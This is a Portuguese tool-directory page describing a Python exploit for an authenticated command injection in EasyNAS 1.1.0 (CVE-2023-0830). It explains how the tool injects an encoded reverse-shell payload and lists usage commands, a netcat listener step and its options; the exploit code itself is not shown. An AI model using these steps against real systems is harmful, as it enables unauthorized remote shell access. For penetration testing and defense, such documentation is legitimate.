Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-0830 — Exploit para EasyNAS versão 1.1.0. A vulnerabilidade explorada é uma falha de injeção de comandos, que requer autenticação. | Kitploit
Ferramentas/GitHubGitHub/xbz0n/cve-2023-0830
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

Exploit para EasyNAS versão 1.1.0. A vulnerabilidade explorada é uma falha de injeção de comandos, que requer autenticação.

Ver Repositório
1113há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-0830: Exploit de Injeção de Comandos do SO Autenticado no EasyNAS 1.1.0

Este script Python é um exploit poderoso para o EasyNAS versão 1.1.0 com funcionalidades aprimoradas, incluindo um listener integrado. A vulnerabilidade explorada é uma falha de injeção de comandos que requer autenticação.

O script estabelece uma sessão com o servidor alvo e, em seguida, envia uma requisição de login com as credenciais fornecidas pelo utilizador. Após autenticação bem-sucedida, o script constrói um payload que, quando executado, abre uma conexão reverse shell para um IP e porta especificados pelo utilizador. Este payload é codificado em URL e Base64 e, em seguida, injetado no ficheiro backup.pl no servidor através de uma requisição GET cuidadosamente elaborada.

CVE: CVE-2023-0830

Autor do Exploit

Ivan Spiridonov (xbz0n) https://xbz0n.sh

Página inicial do fornecedor

https://www.easynas.org

Recursos

  • Listener reverse shell integrado – não é necessário um processo netcat separado
  • Deteção automática de endereço IP para o listener
  • Opção de usar diferentes tipos de shell (bash, sh, python)
  • Suporte para HTTP e HTTPS
  • Suporte para listeners externos

Uso

Uso básico com listener integrado (recomendado):

python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

Usando listener externo (inicie nc -lvnp 4444 primeiro):

python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

Opções:

--mode {shell,reverse}    Modo de exploração: shell (reverse shell integrado) ou reverse (listener externo)
--lhost IP_ADDRESS        Endereço IP para o listener do reverse shell (detetado automaticamente por padrão)
--lport PORT              Porta para o listener do reverse shell (padrão: 4444)
--protocol {http,https}   Protocolo a utilizar (padrão: https)
--verbose                 Ativar saída detalhada
--shell {bash,sh,python}  Especificar o tipo de shell a usar com o listener integrado (padrão: bash)

Dependências

  • Python 3
  • biblioteca Requests

Aviso Legal

Este script é apenas para fins educacionais e testes de penetração autorizados. Sempre obtenha permissão explícita antes de executar qualquer teste de penetração contra uma rede ou sistema.

Por favor, use com responsabilidade.

Baixar ferramenta